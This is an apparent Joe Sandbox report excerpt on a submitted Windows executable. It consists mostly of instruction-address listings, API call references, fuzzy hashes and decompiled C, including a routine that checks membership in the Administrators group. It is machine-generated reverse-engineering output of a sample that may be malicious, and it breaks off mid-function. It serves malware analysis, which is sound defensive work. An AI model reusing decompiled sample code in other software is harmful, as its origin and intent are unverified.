                                                                                                                                                                                                                                            0x008d5d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d93
                                                                                                                                                                                                                                            0x008d5d93
                                                                                                                                                                                                                                            0x008d5d9a
                                                                                                                                                                                                                                            0x008d5d9d
                                                                                                                                                                                                                                            0x008d5d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d9e
                                                                                                                                                                                                                                            0x008d5d51
                                                                                                                                                                                                                                            0x008d5d5b
                                                                                                                                                                                                                                            0x008d5d72
                                                                                                                                                                                                                                            0x008d60fb
                                                                                                                                                                                                                                            0x008d60fb
                                                                                                                                                                                                                                            0x008d6207
                                                                                                                                                                                                                                            0x008d620a
                                                                                                                                                                                                                                            0x008d620b
                                                                                                                                                                                                                                            0x008d620e
                                                                                                                                                                                                                                            0x008d6217
                                                                                                                                                                                                                                            0x008d5d78
                                                                                                                                                                                                                                            0x008d5d78
                                                                                                                                                                                                                                            0x008d5d80
                                                                                                                                                                                                                                            0x008d5d83
                                                                                                                                                                                                                                            0x008d5d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d84
                                                                                                                                                                                                                                            0x008d5d5d
                                                                                                                                                                                                                                            0x008d5d5f
                                                                                                                                                                                                                                            0x008d5d62
                                                                                                                                                                                                                                            0x008d5d68
                                                                                                                                                                                                                                            0x008d5d64
                                                                                                                                                                                                                                            0x008d5d64
                                                                                                                                                                                                                                            0x008d5d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d62
                                                                                                                                                                                                                                            0x008d5d5b
                                                                                                                                                                                                                                            0x008d5d4f
                                                                                                                                                                                                                                            0x008d5d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d9f
                                                                                                                                                                                                                                            0x008d5d9f
                                                                                                                                                                                                                                            0x008d5da5
                                                                                                                                                                                                                                            0x008d5dab
                                                                                                                                                                                                                                            0x008d5dba
                                                                                                                                                                                                                                            0x008d6218
                                                                                                                                                                                                                                            0x008d621d
                                                                                                                                                                                                                                            0x008d6220
                                                                                                                                                                                                                                            0x008d6221
                                                                                                                                                                                                                                            0x008d6229
                                                                                                                                                                                                                                            0x008d6230
                                                                                                                                                                                                                                            0x008d6247
                                                                                                                                                                                                                                            0x008d626a
                                                                                                                                                                                                                                            0x008d6272
                                                                                                                                                                                                                                            0x008d6249
                                                                                                                                                                                                                                            0x008d6255
                                                                                                                                                                                                                                            0x008d625f
                                                                                                                                                                                                                                            0x008d6264
                                                                                                                                                                                                                                            0x008d6264
                                                                                                                                                                                                                                            0x008d6284
                                                                                                                                                                                                                                            0x008d5dc0
                                                                                                                                                                                                                                            0x008d5dc0
                                                                                                                                                                                                                                            0x008d5dca
                                                                                                                                                                                                                                            0x008d5e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dcc
                                                                                                                                                                                                                                            0x008d5dce
                                                                                                                                                                                                                                            0x008d5e24
                                                                                                                                                                                                                                            0x008d5e24
                                                                                                                                                                                                                                            0x008d5e2c
                                                                                                                                                                                                                                            0x008d5e47
                                                                                                                                                                                                                                            0x008d5e4a
                                                                                                                                                                                                                                            0x008d61d2
                                                                                                                                                                                                                                            0x008d61e2
                                                                                                                                                                                                                                            0x008d61e7
                                                                                                                                                                                                                                            0x008d61ee
                                                                                                                                                                                                                                            0x008d61f1
                                                                                                                                                                                                                                            0x008d61f1
                                                                                                                                                                                                                                            0x008d61f8
                                                                                                                                                                                                                                            0x008d61f8
                                                                                                                                                                                                                                            0x008d5e50
                                                                                                                                                                                                                                            0x008d5e53
                                                                                                                                                                                                                                            0x008d6109
                                                                                                                                                                                                                                            0x008d611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6125
                                                                                                                                                                                                                                            0x008d6137
                                                                                                                                                                                                                                            0x008d613a
                                                                                                                                                                                                                                            0x008d613c
                                                                                                                                                                                                                                            0x008d613e
                                                                                                                                                                                                                                            0x008d613e
                                                                                                                                                                                                                                            0x008d6141
                                                                                                                                                                                                                                            0x008d6141
                                                                                                                                                                                                                                            0x008d6143
                                                                                                                                                                                                                                            0x008d6144
                                                                                                                                                                                                                                            0x008d614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6150
                                                                                                                                                                                                                                            0x008d6152
                                                                                                                                                                                                                                            0x008d615c
                                                                                                                                                                                                                                            0x008d6170
                                                                                                                                                                                                                                            0x008d6172
                                                                                                                                                                                                                                            0x008d617c
                                                                                                                                                                                                                                            0x008d6190
                                                                                                                                                                                                                                            0x008d6190
                                                                                                                                                                                                                                            0x008d6196
                                                                                                                                                                                                                                            0x008d61a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d61ab
                                                                                                                                                                                                                                            0x008d61b9
                                                                                                                                                                                                                                            0x008d61c6
                                                                                                                                                                                                                                            0x008d61c6
                                                                                                                                                                                                                                            0x008d617e
                                                                                                                                                                                                                                            0x008d6180
                                                                                                                                                                                                                                            0x008d618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d618a
                                                                                                                                                                                                                                            0x008d615e
                                                                                                                                                                                                                                            0x008d6160
                                                                                                                                                                                                                                            0x008d616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d616a
                                                                                                                                                                                                                                            0x008d615c
                                                                                                                                                                                                                                            0x008d614a
                                                                                                                                                                                                                                            0x008d610b
                                                                                                                                                                                                                                            0x008d610e
                                                                                                                                                                                                                                            0x008d610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e59
                                                                                                                                                                                                                                            0x008d5e59
                                                                                                                                                                                                                                            0x008d5e5c
                                                                                                                                                                                                                                            0x008d604f
                                                                                                                                                                                                                                            0x008d6056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d605c
                                                                                                                                                                                                                                            0x008d606e
                                                                                                                                                                                                                                            0x008d6071
                                                                                                                                                                                                                                            0x008d6073
                                                                                                                                                                                                                                            0x008d6075
                                                                                                                                                                                                                                            0x008d6075
                                                                                                                                                                                                                                            0x008d6078
                                                                                                                                                                                                                                            0x008d6078
                                                                                                                                                                                                                                            0x008d607a
                                                                                                                                                                                                                                            0x008d607b
                                                                                                                                                                                                                                            0x008d6081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6087
                                                                                                                                                                                                                                            0x008d6087
                                                                                                                                                                                                                                            0x008d608d
                                                                                                                                                                                                                                            0x008d609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d60a2
                                                                                                                                                                                                                                            0x008d60aa
                                                                                                                                                                                                                                            0x008d60b2
                                                                                                                                                                                                                                            0x008d60b7
                                                                                                                                                                                                                                            0x008d60bd
                                                                                                                                                                                                                                            0x008d60bf
                                                                                                                                                                                                                                            0x008d60bf
                                                                                                                                                                                                                                            0x008d60d6
                                                                                                                                                                                                                                            0x008d60e0
                                                                                                                                                                                                                                            0x008d60e7
                                                                                                                                                                                                                                            0x008d60f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d60f5
                                                                                                                                                                                                                                            0x008d609c
                                                                                                                                                                                                                                            0x008d6081
                                                                                                                                                                                                                                            0x008d5e62
                                                                                                                                                                                                                                            0x008d5e62
                                                                                                                                                                                                                                            0x008d5e65
                                                                                                                                                                                                                                            0x008d5fd3
                                                                                                                                                                                                                                            0x008d5fe9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5fef
                                                                                                                                                                                                                                            0x008d5fef
                                                                                                                                                                                                                                            0x008d5ff7
                                                                                                                                                                                                                                            0x008d5ffd
                                                                                                                                                                                                                                            0x008d6003
                                                                                                                                                                                                                                            0x008d6006
                                                                                                                                                                                                                                            0x008d6011
                                                                                                                                                                                                                                            0x008d6014
                                                                                                                                                                                                                                            0x008d603d
                                                                                                                                                                                                                                            0x008d6016
                                                                                                                                                                                                                                            0x008d6018
                                                                                                                                                                                                                                            0x008d6019
                                                                                                                                                                                                                                            0x008d601b
                                                                                                                                                                                                                                            0x008d6033
                                                                                                                                                                                                                                            0x008d601d
                                                                                                                                                                                                                                            0x008d6020
                                                                                                                                                                                                                                            0x008d6029
                                                                                                                                                                                                                                            0x008d6022
                                                                                                                                                                                                                                            0x008d6022
                                                                                                                                                                                                                                            0x008d6022
                                                                                                                                                                                                                                            0x008d6020
                                                                                                                                                                                                                                            0x008d601b
                                                                                                                                                                                                                                            0x008d6042
                                                                                                                                                                                                                                            0x008d6044
                                                                                                                                                                                                                                            0x008d6046
                                                                                                                                                                                                                                            0x008d604a
                                                                                                                                                                                                                                            0x008d5ff7
                                                                                                                                                                                                                                            0x008d5fd5
                                                                                                                                                                                                                                            0x008d5fd8
                                                                                                                                                                                                                                            0x008d5fd8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e6b
                                                                                                                                                                                                                                            0x008d5e6b
                                                                                                                                                                                                                                            0x008d5e6e
                                                                                                                                                                                                                                            0x008d5f8b
                                                                                                                                                                                                                                            0x008d5f99
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5f9f
                                                                                                                                                                                                                                            0x008d5fa7
                                                                                                                                                                                                                                            0x008d5faf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5fb1
                                                                                                                                                                                                                                            0x008d5fb3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5fb5
                                                                                                                                                                                                                                            0x008d5fb7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5fb9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5fb9
                                                                                                                                                                                                                                            0x008d5fb7
                                                                                                                                                                                                                                            0x008d5fb3
                                                                                                                                                                                                                                            0x008d5faf
                                                                                                                                                                                                                                            0x008d5f8d
                                                                                                                                                                                                                                            0x008d5f8d
                                                                                                                                                                                                                                            0x008d5f8d
                                                                                                                                                                                                                                            0x008d5f8f
                                                                                                                                                                                                                                            0x008d5fc1
                                                                                                                                                                                                                                            0x008d5fc1
                                                                                                                                                                                                                                            0x008d5fc1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e74
                                                                                                                                                                                                                                            0x008d5e74
                                                                                                                                                                                                                                            0x008d5e77
                                                                                                                                                                                                                                            0x008d5ea0
                                                                                                                                                                                                                                            0x008d5ebd
                                                                                                                                                                                                                                            0x008d5f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5f7f
                                                                                                                                                                                                                                            0x008d5ec3
                                                                                                                                                                                                                                            0x008d5ec3
                                                                                                                                                                                                                                            0x008d5ecc
                                                                                                                                                                                                                                            0x008d5ed4
                                                                                                                                                                                                                                            0x008d5ed6
                                                                                                                                                                                                                                            0x008d5edc
                                                                                                                                                                                                                                            0x008d5edf
                                                                                                                                                                                                                                            0x008d5eea
                                                                                                                                                                                                                                            0x008d5eed
                                                                                                                                                                                                                                            0x008d5f3f
                                                                                                                                                                                                                                            0x008d5f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5eef
                                                                                                                                                                                                                                            0x008d5eef
                                                                                                                                                                                                                                            0x008d5ef2
                                                                                                                                                                                                                                            0x008d5f34
                                                                                                                                                                                                                                            0x008d5ef4
                                                                                                                                                                                                                                            0x008d5ef4
                                                                                                                                                                                                                                            0x008d5ef7
                                                                                                                                                                                                                                            0x008d5f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5ef9
                                                                                                                                                                                                                                            0x008d5ef9
                                                                                                                                                                                                                                            0x008d5efc
                                                                                                                                                                                                                                            0x008d5f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5efe
                                                                                                                                                                                                                                            0x008d5eff
                                                                                                                                                                                                                                            0x008d5f02
                                                                                                                                                                                                                                            0x008d5f16
                                                                                                                                                                                                                                            0x008d5f04
                                                                                                                                                                                                                                            0x008d5f07
                                                                                                                                                                                                                                            0x008d5f0d
                                                                                                                                                                                                                                            0x008d5f46
                                                                                                                                                                                                                                            0x008d5f46
                                                                                                                                                                                                                                            0x008d5f09
                                                                                                                                                                                                                                            0x008d5f09
                                                                                                                                                                                                                                            0x008d5f09
                                                                                                                                                                                                                                            0x008d5f07
                                                                                                                                                                                                                                            0x008d5f02
                                                                                                                                                                                                                                            0x008d5efc
                                                                                                                                                                                                                                            0x008d5ef7
                                                                                                                                                                                                                                            0x008d5ef2
                                                                                                                                                                                                                                            0x008d5f4c
                                                                                                                                                                                                                                            0x008d5f4e
                                                                                                                                                                                                                                            0x008d5f50
                                                                                                                                                                                                                                            0x008d5f54
                                                                                                                                                                                                                                            0x008d5ed4
                                                                                                                                                                                                                                            0x008d5ea2
                                                                                                                                                                                                                                            0x008d5ea4
                                                                                                                                                                                                                                            0x008d5eaf
                                                                                                                                                                                                                                            0x008d5eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e79
                                                                                                                                                                                                                                            0x008d5e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e83
                                                                                                                                                                                                                                            0x008d5e83
                                                                                                                                                                                                                                            0x008d5e83
                                                                                                                                                                                                                                            0x008d5e85
                                                                                                                                                                                                                                            0x008d5e85
                                                                                                                                                                                                                                            0x008d5e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5e94
                                                                                                                                                                                                                                            0x008d5e8e
                                                                                                                                                                                                                                            0x008d5e7d
                                                                                                                                                                                                                                            0x008d5e77
                                                                                                                                                                                                                                            0x008d5e6e
                                                                                                                                                                                                                                            0x008d5e65
                                                                                                                                                                                                                                            0x008d5e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5dd0
                                                                                                                                                                                                                                            0x008d5dce
                                                                                                                                                                                                                                            0x008d5dca
                                                                                                                                                                                                                                            0x008d5dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5d00
                                                                                                                                                                                                                                            0x008d5dd9
                                                                                                                                                                                                                                            0x008d5e04
                                                                                                                                                                                                                                            0x008d61fe
                                                                                                                                                                                                                                            0x008d5e0a
                                                                                                                                                                                                                                            0x008d5e0c
                                                                                                                                                                                                                                            0x008d5e17
                                                                                                                                                                                                                                            0x008d5e17
                                                                                                                                                                                                                                            0x008d5e04
                                                                                                                                                                                                                                            0x008d6200
                                                                                                                                                                                                                                            0x008d6200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 008D5CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(008D8B3E,00000104,00000000,?,?), ref: 008D5DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D5E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 008D5EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 008D5F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D5FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 008D6008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 008D60AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,008D1140,00000000,00000040,00000000), ref: 008D61F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 008D61F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 7c6beaaa7f773ccfb1cd1dc3dcc29c4aa6d08e714b4442feaaa297caa0e114ea
                                                                                                                                                                                                                                            • Instruction ID: b2462a64787690b3ee01047a116c2302f5fdeda26c7d93d8bc600d3bc6e4a1a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c6beaaa7f773ccfb1cd1dc3dcc29c4aa6d08e714b4442feaaa297caa0e114ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D17971A04A5D9EDF359B3C8C487BA3B62FB56354F1403ABC4C6D6391EA708E828B51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E008D18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x8d8128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E008D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E008D17EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0x8d8128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d8128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d18a3
                                                                                                                                                                                                                                            0x008d18a3
                                                                                                                                                                                                                                            0x008d18ab
                                                                                                                                                                                                                                            0x008d18b2
                                                                                                                                                                                                                                            0x008d18b5
                                                                                                                                                                                                                                            0x008d18be
                                                                                                                                                                                                                                            0x008d18c0
                                                                                                                                                                                                                                            0x008d18c6
                                                                                                                                                                                                                                            0x008d18c7
                                                                                                                                                                                                                                            0x008d18ca
                                                                                                                                                                                                                                            0x008d18cf
                                                                                                                                                                                                                                            0x008d19c9
                                                                                                                                                                                                                                            0x008d19d8
                                                                                                                                                                                                                                            0x008d19d8
                                                                                                                                                                                                                                            0x008d18df
                                                                                                                                                                                                                                            0x008d19b8
                                                                                                                                                                                                                                            0x008d19bd
                                                                                                                                                                                                                                            0x008d19bf
                                                                                                                                                                                                                                            0x008d19bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d19bd
                                                                                                                                                                                                                                            0x008d18fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1912
                                                                                                                                                                                                                                            0x008d19aa
                                                                                                                                                                                                                                            0x008d19ad
                                                                                                                                                                                                                                            0x008d19b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1927
                                                                                                                                                                                                                                            0x008d1927
                                                                                                                                                                                                                                            0x008d1932
                                                                                                                                                                                                                                            0x008d1936
                                                                                                                                                                                                                                            0x008d19a9
                                                                                                                                                                                                                                            0x008d19a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d19a9
                                                                                                                                                                                                                                            0x008d194c
                                                                                                                                                                                                                                            0x008d19a2
                                                                                                                                                                                                                                            0x008d19a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d196e
                                                                                                                                                                                                                                            0x008d1970
                                                                                                                                                                                                                                            0x008d1999
                                                                                                                                                                                                                                            0x008d199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d199c
                                                                                                                                                                                                                                            0x008d1972
                                                                                                                                                                                                                                            0x008d1972
                                                                                                                                                                                                                                            0x008d1975
                                                                                                                                                                                                                                            0x008d1984
                                                                                                                                                                                                                                            0x008d1985
                                                                                                                                                                                                                                            0x008d198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d198c
                                                                                                                                                                                                                                            0x008d1991
                                                                                                                                                                                                                                            0x008d1996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1996
                                                                                                                                                                                                                                            0x008d194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008D18DD), ref: 008D181A
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008D182C
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: AllocateAndInitializeSid.ADVAPI32(008D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008D18DD), ref: 008D1855
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: FreeSid.ADVAPI32(?,?,?,?,008D18DD), ref: 008D1883
                                                                                                                                                                                                                                              • Part of subcall function 008D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,008D18DD), ref: 008D188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008D18EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008D18F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 008D190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008D1918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 008D192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 008D1944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D1964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 008D197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 008D199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008D19A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D19AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: acd4905345bbd2202b36ba950be2cf2d5b6f42bf02a8fed7dd825bbc619db19a
                                                                                                                                                                                                                                            • Instruction ID: ffe765b9162013254eafc16b7066af14264dfed164a5436d2da70630588189d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acd4905345bbd2202b36ba950be2cf2d5b6f42bf02a8fed7dd825bbc619db19a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8311971A01209FBDF209FA6DCA8AAFBBB8FF04710F60462AE545D2250DB319D05CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E008D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
